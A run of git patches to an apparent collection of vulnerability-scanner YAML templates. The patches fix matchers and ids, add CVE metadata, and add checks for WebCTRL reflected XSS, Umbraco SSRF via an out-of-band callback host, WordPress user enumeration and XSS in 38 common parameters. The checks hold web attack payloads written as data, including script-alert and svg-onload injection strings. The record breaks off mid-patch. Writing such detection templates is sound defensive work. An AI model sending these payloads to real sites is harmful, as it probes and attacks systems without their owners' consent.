b/token-spray/api-virustotal.yaml @@ -11,7 +11,7 @@ self-contained: true requests: - raw: - | - POST /vtapi/v2/url/scan HTTP/1.1 + POST https://www.virustotal.com/vtapi/v2/url/scan HTTP/1.1 Host: www.virustotal.com Content-Type: application/x-www-form-urlencoded Content-Length: 86 @@ -19,7 +19,10 @@ requests: apikey={{token}}&url=google.com matchers: - - type: status - negative: true - status: - - 403 + - type: word + part: body + words: + - "'verbose_msg':" + - "'scan_date':" + - "'permalink':" + condition: and From e0c46a630a0c9db703868039a7bc59f61a91f3b6 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 30 Oct 2021 00:27:51 +0530 Subject: [PATCH 3302/4083] Added missing condition matcher --- exposed-panels/movable-type-login.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/exposed-panels/movable-type-login.yaml b/exposed-panels/movable-type-login.yaml index 10a7bfaddb..bea6e57cda 100644 --- a/exposed-panels/movable-type-login.yaml +++ b/exposed-panels/movable-type-login.yaml @@ -4,7 +4,7 @@ info: name: Movable Type Pro author: dhiyaneshDk severity: info - tags: login,movable + tags: panel,movable metadata: shodan-query: 'title:"サインイン | Movable Type Pro"' @@ -13,11 +13,13 @@ requests: path: - '{{BaseURL}}/mt/admin' - '{{BaseURL}}/mt.cgi' + + matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: status status: From b646a7de9b25023f8d4a4f4cd6d2a22f3c6b836c Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 30 Oct 2021 00:29:13 +0530 Subject: [PATCH 3303/4083] improved workflow + syntax fix --- workflows/movable-workflow.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/workflows/movable-workflow.yaml b/workflows/movable-workflow.yaml index ebfd1dd181..b76237ff1a 100644 --- a/workflows/movable-workflow.yaml +++ b/workflows/movable-workflow.yaml @@ -8,5 +8,8 @@ info: workflows: - template: technologies/default-movable-page.yaml subtemplates: - - template: /exposed-panels/movable-type-login.yaml - - template: /cves/2021/CVE-2021-20837.yaml + - template: cves/2021/CVE-2021-20837.yaml + + - template: exposed-panels/movable-type-login.yaml + subtemplates: + - template: cves/2021/CVE-2021-20837.yaml \ No newline at end of file From 78e0f016c71d4aea7a29de5f99e15c6c06fae267 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 30 Oct 2021 00:31:57 +0530 Subject: [PATCH 3304/4083] matcher update --- exposed-panels/movable-type-login.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposed-panels/movable-type-login.yaml b/exposed-panels/movable-type-login.yaml index bea6e57cda..d71459d6ed 100644 --- a/exposed-panels/movable-type-login.yaml +++ b/exposed-panels/movable-type-login.yaml @@ -14,12 +14,13 @@ requests: - '{{BaseURL}}/mt/admin' - '{{BaseURL}}/mt.cgi' + stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - - "" + - "Movable Type Pro" - type: status status: From 9e1f9859d81f2f6433663c12b4012283015bec52 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 30 Oct 2021 11:03:14 +0530 Subject: [PATCH 3305/4083] Create umbraco-base-ssrf.yaml --- misconfiguration/umbraco-base-ssrf.yaml | 29 +++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 misconfiguration/umbraco-base-ssrf.yaml diff --git a/misconfiguration/umbraco-base-ssrf.yaml b/misconfiguration/umbraco-base-ssrf.yaml new file mode 100644 index 0000000000..6f3446675f --- /dev/null +++ b/misconfiguration/umbraco-base-ssrf.yaml @@ -0,0 +1,29 @@ +id: umbraco-base-ssrf + +info: + name: Umbraco v8.14.1 - 'baseUrl' SSRF + author: dhiyaneshDk + severity: medium + reference: + - https://www.exploit-db.com/exploits/50462 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.30 + cve-id: CVE-2020-10770 + cwe-id: CWE-601 + tags: ssrf,oast,umbraco + +requests: + - method: GET + path: + - '{{BaseURL}}/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=http://{{interactsh-url}}' + - '{{BaseURL}}/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=http://{{interactsh-url}}/' + - '{{BaseURL}}/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=http://{{interactsh-url}}/' + + stop-at-first-match: true + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 43629d5f49663f139aac3c5060d23af4904683c1 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sat, 30 Oct 2021 19:04:42 +0900 Subject: [PATCH 3306/4083] Create CVE-2021-31682.yaml The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized. This issue impacts versions 6.5 and below. This issue works by passing in a basic XSS payload to a vulnerable GET parameter that is reflected in the output without sanitization. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-31682.yaml | 39 +++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 cves/2021/CVE-2021-31682.yaml diff --git a/cves/2021/CVE-2021-31682.yaml b/cves/2021/CVE-2021-31682.yaml new file mode 100644 index 0000000000..b17547ac27 --- /dev/null +++ b/cves/2021/CVE-2021-31682.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-31682 + +info: + name: WebCTRL OEM - Reflected XSS + author: gy741,dhiyaneshDk + severity: medium + description: The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized. This issue impacts versions 6.5 and below. This issue works by passing in a basic XSS payload to a vulnerable GET parameter that is reflected in the output without sanitization. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-31682 + - https://github.com/3ndG4me/WebCTRL-OperatorLocale-Parameter-Reflected-XSS + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-31682 + cwe-id: CWE-79 + tags: cve,cve2021,webctrl,xss + metadata: + shodan-query: 'html:"/_common/lvl5/dologin.jsp"' + +requests: + - method: GET + path: + - '{{BaseURL}}/index.jsp?operatorlocale=en/%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E%20' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - ">" + part: body + + - type: word + words: + - "text/html" + part: header From 2d50cb52c635627653f91666ec001dc3e65891f8 Mon Sep 17 00:00:00 2001 From: r3dg33k <2913793+r3dg33k@users.noreply.github.com> Date: Sat, 30 Oct 2021 13:46:56 +0300 Subject: [PATCH 3307/4083] Add files via upload --- .../wordpress/wordpress-rdf-user-enum.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml diff --git a/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml b/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml new file mode 100644 index 0000000000..137c58a48d --- /dev/null +++ b/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml @@ -0,0 +1,26 @@ +id: Wordpress-RDF-User-Enum +info: + name: Wordpress-RDF-User-Enumeration + author: r3dg33k + severity: info + reference: + tags: wordpress + +requests: + - method: GET + path: + - '{{BaseURL}}/feed/rdf' + redirects: true + + matchers-condition: and + matchers: + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - '' \ No newline at end of file From f75fcde7a9e45095684cd675d4c813588f386329 Mon Sep 17 00:00:00 2001 From: r3dg33k <2913793+r3dg33k@users.noreply.github.com> Date: Sat, 30 Oct 2021 13:56:04 +0300 Subject: [PATCH 3308/4083] Update wordpress-rdf-user-enum.yaml --- vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml b/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml index 137c58a48d..ad48f6ce1f 100644 --- a/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml +++ b/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml @@ -5,7 +5,7 @@ info: severity: info reference: tags: wordpress - + requests: - method: GET path: @@ -14,13 +14,11 @@ requests: matchers-condition: and matchers: - - type: status status: - 200 - extractors: - type: regex part: body regex: - - '' \ No newline at end of file + - '' From f3a44a7f507b76e7c187f919abb6582076356bca Mon Sep 17 00:00:00 2001 From: r3dg33k <2913793+r3dg33k@users.noreply.github.com> Date: Sat, 30 Oct 2021 13:57:53 +0300 Subject: [PATCH 3309/4083] Update wordpress-rdf-user-enum.yaml --- vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml b/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml index ad48f6ce1f..dad7a80c1b 100644 --- a/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml +++ b/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml @@ -3,9 +3,9 @@ info: name: Wordpress-RDF-User-Enumeration author: r3dg33k severity: info - reference: + reference: tags: wordpress - + requests: - method: GET path: @@ -14,9 +14,11 @@ requests: matchers-condition: and matchers: + - type: status status: - 200 + extractors: - type: regex part: body From 292522612241e5e6ba000d0b3d2b5b46dd656743 Mon Sep 17 00:00:00 2001 From: r3dg33k <2913793+r3dg33k@users.noreply.github.com> Date: Sat, 30 Oct 2021 13:58:24 +0300 Subject: [PATCH 3310/4083] Update wordpress-rdf-user-enum.yaml --- vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml b/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml index dad7a80c1b..25e847f6ea 100644 --- a/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml +++ b/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml @@ -3,7 +3,7 @@ info: name: Wordpress-RDF-User-Enumeration author: r3dg33k severity: info - reference: + reference: N/A tags: wordpress requests: From 8c3f98c767ebdeaa47a9251d7e478d093b4f0460 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 30 Oct 2021 16:47:35 +0530 Subject: [PATCH 3311/4083] fixed invalid template syntax --- cves/2018/CVE-2018-10818.yaml | 2 +- cves/2018/CVE-2018-9845.yaml | 2 +- cves/2021/CVE-2021-35336.yaml | 2 +- exposures/configs/exposed-authentication-asmx.yaml | 2 +- file/electron/electron-version-detect.yaml | 2 +- takeovers/wix-takeover.yaml | 1 + ...fault-asp.net-page.yaml => default-asp-net-page.yaml} | 5 +++-- ...fastjson-1.2.24-rce.yaml => fastjson-1-2-24-rce.yaml} | 2 +- ...fastjson-1.2.41-rce.yaml => fastjson-1-2-41-rce.yaml} | 2 +- ...fastjson-1.2.42-rce.yaml => fastjson-1-2-42-rce.yaml} | 2 +- ...fastjson-1.2.43-rce.yaml => fastjson-1-2-43-rce.yaml} | 2 +- ...fastjson-1.2.47-rce.yaml => fastjson-1-2-47-rce.yaml} | 2 +- ...fastjson-1.2.62-rce.yaml => fastjson-1-2-62-rce.yaml} | 2 +- ...fastjson-1.2.67-rce.yaml => fastjson-1-2-67-rce.yaml} | 2 +- ...fastjson-1.2.68-rce.yaml => fastjson-1-2-68-rce.yaml} | 2 +- vulnerabilities/other/nuuo-file-inclusion.yaml | 9 ++++++--- vulnerabilities/other/spark-webui-unauth.yaml | 2 +- 17 files changed, 24 insertions(+), 19 deletions(-) rename technologies/{default-asp.net-page.yaml => default-asp-net-page.yaml} (93%) rename vulnerabilities/fastjson/{fastjson-1.2.24-rce.yaml => fastjson-1-2-24-rce.yaml} (96%) rename vulnerabilities/fastjson/{fastjson-1.2.41-rce.yaml => fastjson-1-2-41-rce.yaml} (95%) rename vulnerabilities/fastjson/{fastjson-1.2.42-rce.yaml => fastjson-1-2-42-rce.yaml} (95%) rename vulnerabilities/fastjson/{fastjson-1.2.43-rce.yaml => fastjson-1-2-43-rce.yaml} (95%) rename vulnerabilities/fastjson/{fastjson-1.2.47-rce.yaml => fastjson-1-2-47-rce.yaml} (96%) rename vulnerabilities/fastjson/{fastjson-1.2.62-rce.yaml => fastjson-1-2-62-rce.yaml} (95%) rename vulnerabilities/fastjson/{fastjson-1.2.67-rce.yaml => fastjson-1-2-67-rce.yaml} (95%) rename vulnerabilities/fastjson/{fastjson-1.2.68-rce.yaml => fastjson-1-2-68-rce.yaml} (97%) diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml index 154d5bc397..f4982c8731 100644 --- a/cves/2018/CVE-2018-10818.yaml +++ b/cves/2018/CVE-2018-10818.yaml @@ -1,4 +1,4 @@ -id: CVE-2018–10818 +id: CVE-2018-10818 info: name: LG NAS Devices - Remote Code Execution (Unauthenticated) diff --git a/cves/2018/CVE-2018-9845.yaml b/cves/2018/CVE-2018-9845.yaml index 9b9b600503..3aff165b1f 100644 --- a/cves/2018/CVE-2018-9845.yaml +++ b/cves/2018/CVE-2018-9845.yaml @@ -1,4 +1,4 @@ -id: CVE-2018–9845 +id: CVE-2018-9845 info: name: Etherpad Lite before 1.6.4 is exploitable for admin access. diff --git a/cves/2021/CVE-2021-35336.yaml b/cves/2021/CVE-2021-35336.yaml index 6fdac1d2be..e7d6aa88bd 100644 --- a/cves/2021/CVE-2021-35336.yaml +++ b/cves/2021/CVE-2021-35336.yaml @@ -1,4 +1,4 @@ -id: CVE-2021–35336 +id: CVE-2021-35336 info: name: Unauthorised Remote Access of Internal Panel diff --git a/exposures/configs/exposed-authentication-asmx.yaml b/exposures/configs/exposed-authentication-asmx.yaml index 74d554612b..768f731057 100644 --- a/exposures/configs/exposed-authentication-asmx.yaml +++ b/exposures/configs/exposed-authentication-asmx.yaml @@ -1,4 +1,4 @@ -id: exposed-authentication.asmx +id: exposed-authentication-asmx info: name: Exposed Authentication.asmx diff --git a/file/electron/electron-version-detect.yaml b/file/electron/electron-version-detect.yaml index d5276b5cc7..26392dc930 100644 --- a/file/electron/electron-version-detect.yaml +++ b/file/electron/electron-version-detect.yaml @@ -1,4 +1,4 @@ -id: electron-version-detect.yaml +id: electron-version-detect info: name: Electron Version Detect diff --git a/takeovers/wix-takeover.yaml b/takeovers/wix-takeover.yaml index 854916610d..d5f320f4f6 100644 --- a/takeovers/wix-takeover.yaml +++ b/takeovers/wix-takeover.yaml @@ -1,6 +1,7 @@ id: wix-takeover info: + name: Wix Takeover Detection author: harshinsecurity,philippedelteil description: This subdomain take over would only work on an edge case when the account was deleted. You will need a premium account (~ US$7) to test the take over. severity: high diff --git a/technologies/default-asp.net-page.yaml b/technologies/default-asp-net-page.yaml similarity index 93% rename from technologies/default-asp.net-page.yaml rename to technologies/default-asp-net-page.yaml index 8aaa46e76f..9a0ff60ee2 100644 --- a/technologies/default-asp.net-page.yaml +++ b/technologies/default-asp-net-page.yaml @@ -1,4 +1,4 @@ -id: default-asp.net-page +id: default-asp-net-page info: name: ASP.Net Test Page @@ -11,8 +11,9 @@ requests: - method: GET path: - '{{BaseURL}}' + matchers: - type: word + part: body words: - "Home Page - My ASP.NET Application" - part: body diff --git a/vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml b/vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml similarity index 96% rename from vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml rename to vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml index b914c4b0e3..9a4ba92243 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml @@ -1,4 +1,4 @@ -id: fastjson-1.2.24-rce +id: fastjson-1-2-24-rce info: name: Fastjson 1.2.24 Deserialization RCE diff --git a/vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml b/vulnerabilities/fastjson/fastjson-1-2-41-rce.yaml similarity index 95% rename from vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml rename to vulnerabilities/fastjson/fastjson-1-2-41-rce.yaml index 84843c7c35..3564ca14eb 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1-2-41-rce.yaml @@ -1,4 +1,4 @@ -id: fastjson-1.2.41-rce +id: fastjson-1-2-41-rce info: name: Fastjson 1.2.41 Deserialization RCE diff --git a/vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml b/vulnerabilities/fastjson/fastjson-1-2-42-rce.yaml similarity index 95% rename from vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml rename to vulnerabilities/fastjson/fastjson-1-2-42-rce.yaml index a6146589d3..6ea56f483d 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1-2-42-rce.yaml @@ -1,4 +1,4 @@ -id: fastjson-1.2.42-rce +id: fastjson-1-2-42-rce info: name: Fastjson 1.2.42 Deserialization RCE diff --git a/vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml b/vulnerabilities/fastjson/fastjson-1-2-43-rce.yaml similarity index 95% rename from vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml rename to vulnerabilities/fastjson/fastjson-1-2-43-rce.yaml index 98c915edeb..4a30340ea2 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1-2-43-rce.yaml @@ -1,4 +1,4 @@ -id: fastjson-1.2.43-rce +id: fastjson-1-2-43-rce info: name: Fastjson 1.2.43 Deserialization RCE diff --git a/vulnerabilities/fastjson/fastjson-1.2.47-rce.yaml b/vulnerabilities/fastjson/fastjson-1-2-47-rce.yaml similarity index 96% rename from vulnerabilities/fastjson/fastjson-1.2.47-rce.yaml rename to vulnerabilities/fastjson/fastjson-1-2-47-rce.yaml index 1c8990b146..3336b0ec72 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.47-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1-2-47-rce.yaml @@ -1,4 +1,4 @@ -id: fastjson-1.2.47-rce +id: fastjson-1-2-47-rce info: name: Fastjson 1.2.47 Deserialization RCE diff --git a/vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml b/vulnerabilities/fastjson/fastjson-1-2-62-rce.yaml similarity index 95% rename from vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml rename to vulnerabilities/fastjson/fastjson-1-2-62-rce.yaml index 236712a7b8..7f16ccb998 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1-2-62-rce.yaml @@ -1,4 +1,4 @@ -id: fastjson-1.2.62-rce +id: fastjson-1-2-62-rce info: name: Fastjson 1.2.62 Deserialization RCE diff --git a/vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml b/vulnerabilities/fastjson/fastjson-1-2-67-rce.yaml similarity index 95% rename from vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml rename to vulnerabilities/fastjson/fastjson-1-2-67-rce.yaml index 326f2fb9ff..0720680d36 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1-2-67-rce.yaml @@ -1,4 +1,4 @@ -id: fastjson-1.2.67-rce +id: fastjson-1-2-67-rce info: name: Fastjson 1.2.67 Deserialization RCE diff --git a/vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml b/vulnerabilities/fastjson/fastjson-1-2-68-rce.yaml similarity index 97% rename from vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml rename to vulnerabilities/fastjson/fastjson-1-2-68-rce.yaml index 64d91e3be9..0779215459 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1-2-68-rce.yaml @@ -1,4 +1,4 @@ -id: fastjson-1.2.68-rce +id: fastjson-1-2-68-rce info: name: Fastjson 1.2.68 Deserialization RCE diff --git a/vulnerabilities/other/nuuo-file-inclusion.yaml b/vulnerabilities/other/nuuo-file-inclusion.yaml index 65c7e3c5cf..0cfcc394fe 100644 --- a/vulnerabilities/other/nuuo-file-inclusion.yaml +++ b/vulnerabilities/other/nuuo-file-inclusion.yaml @@ -1,4 +1,5 @@ -id: nuuo-file-inclusion.yaml +id: nuuo-file-inclusion + info: name: NUUO NVRmini 2 3.0.8 Local File Disclosure author: princechaddha @@ -14,13 +15,15 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "$_GET['css']" - part: body + - type: word + part: header words: - "text/css" - part: header + - type: status status: - 200 diff --git a/vulnerabilities/other/spark-webui-unauth.yaml b/vulnerabilities/other/spark-webui-unauth.yaml index bd4e737908..fdc11f53c8 100644 --- a/vulnerabilities/other/spark-webui-unauth.yaml +++ b/vulnerabilities/other/spark-webui-unauth.yaml @@ -1,4 +1,4 @@ -id: spark-webui-unauth.yaml +id: spark-webui-unauth info: name: Unauthenticated Spark WebUI author: princechaddha From 4cc2a7a205a2bfce3a6b7d5d33ff4d788ae08b13 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 30 Oct 2021 11:41:59 +0000 Subject: [PATCH 3312/4083] Auto Generated CVE annotations [Sat Oct 30 11:41:59 UTC 2021] :robot: --- cves/2021/CVE-2021-35336.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-35336.yaml b/cves/2021/CVE-2021-35336.yaml index e7d6aa88bd..771e20c8d6 100644 --- a/cves/2021/CVE-2021-35336.yaml +++ b/cves/2021/CVE-2021-35336.yaml @@ -9,6 +9,11 @@ info: - https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c - https://nvd.nist.gov/vuln/detail/CVE-2021-35336 tags: cve,cve2021,tieline,default-login + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-35336 + cwe-id: CWE-863 requests: - method: GET From 40340c89c62fec65ee94429ecbccc8f9223f8989 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 30 Oct 2021 17:33:53 +0530 Subject: [PATCH 3313/4083] Update and rename misconfiguration/umbraco-base-ssrf.yaml to misconfiguration/vulnerabilities/other/umbraco-base-ssrf.yaml --- .../{ => vulnerabilities/other}/umbraco-base-ssrf.yaml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) rename misconfiguration/{ => vulnerabilities/other}/umbraco-base-ssrf.yaml (91%) diff --git a/misconfiguration/umbraco-base-ssrf.yaml b/misconfiguration/vulnerabilities/other/umbraco-base-ssrf.yaml similarity index 91% rename from misconfiguration/umbraco-base-ssrf.yaml rename to misconfiguration/vulnerabilities/other/umbraco-base-ssrf.yaml index 6f3446675f..6d0d87195a 100644 --- a/misconfiguration/umbraco-base-ssrf.yaml +++ b/misconfiguration/vulnerabilities/other/umbraco-base-ssrf.yaml @@ -4,14 +4,13 @@ info: name: Umbraco v8.14.1 - 'baseUrl' SSRF author: dhiyaneshDk severity: medium - reference: - - https://www.exploit-db.com/exploits/50462 + reference: https://www.exploit-db.com/exploits/50462 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.30 cve-id: CVE-2020-10770 cwe-id: CWE-601 - tags: ssrf,oast,umbraco + tags: ssrf,umbraco,oob requests: - method: GET @@ -21,7 +20,6 @@ requests: - '{{BaseURL}}/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=http://{{interactsh-url}}/' stop-at-first-match: true - matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction From 107679bd9a25e3670170f5da4f002f300911778e Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 30 Oct 2021 19:26:12 +0530 Subject: [PATCH 3314/4083] matcher + added version extractors --- cves/2018/CVE-2018-15473.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-15473.yaml b/cves/2018/CVE-2018-15473.yaml index 546ea91901..172a910f59 100644 --- a/cves/2018/CVE-2018-15473.yaml +++ b/cves/2018/CVE-2018-15473.yaml @@ -21,4 +21,9 @@ network: matchers: - type: regex regex: - - 'SSH-2.0-OpenSSH_[1-7].*' + - 'SSH-2.0-OpenSSH_[1-7]' + + extractors: + - type: regex + regex: + - 'SSH-2.0-OpenSSH_([0-9.]+)' From 4d58562095044a02800b80b3f2258d05d2d7f301 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 30 Oct 2021 22:06:04 +0530 Subject: [PATCH 3315/4083] Update umbraco-base-ssrf.yaml --- misconfiguration/vulnerabilities/other/umbraco-base-ssrf.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/vulnerabilities/other/umbraco-base-ssrf.yaml b/misconfiguration/vulnerabilities/other/umbraco-base-ssrf.yaml index 6d0d87195a..c954e0b016 100644 --- a/misconfiguration/vulnerabilities/other/umbraco-base-ssrf.yaml +++ b/misconfiguration/vulnerabilities/other/umbraco-base-ssrf.yaml @@ -10,7 +10,7 @@ info: cvss-score: 5.30 cve-id: CVE-2020-10770 cwe-id: CWE-601 - tags: ssrf,umbraco,oob + tags: ssrf,umbraco,oast requests: - method: GET From 26c298ed035a92bcd12ba21d170a284dd4b483cb Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Sat, 30 Oct 2021 16:26:28 -0500 Subject: [PATCH 3316/4083] Update top-xss-params.yaml added an additional 23 parameters and matchers --- vulnerabilities/generic/top-xss-params.yaml | 29 +++++++++++++++++++-- 1 file changed, 27 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/generic/top-xss-params.yaml b/vulnerabilities/generic/top-xss-params.yaml index bcee1a4694..8c12c7622e 100644 --- a/vulnerabilities/generic/top-xss-params.yaml +++ b/vulnerabilities/generic/top-xss-params.yaml @@ -1,18 +1,20 @@ id: top-xss-params info: - name: Top 15 XSS Parameter Check + name: Top 38 XSS Parameter Check author: foulenzer,geeknik severity: medium description: Searches for reflected XSS in the server response via GET-requests. tags: xss,generic metadata: - parameters: q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p + parameters: q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p,month,page_id,password,terms,token,type,unsubscribe_token,api,api_key,begindate,callback,categoryid,csrf_token,email,emailto,enddate,immagine,item,jsonp,l,lang,list_type,year requests: - method: GET path: - "{{BaseURL}}/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E" + - "{{BaseURL}}/?api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E" + - 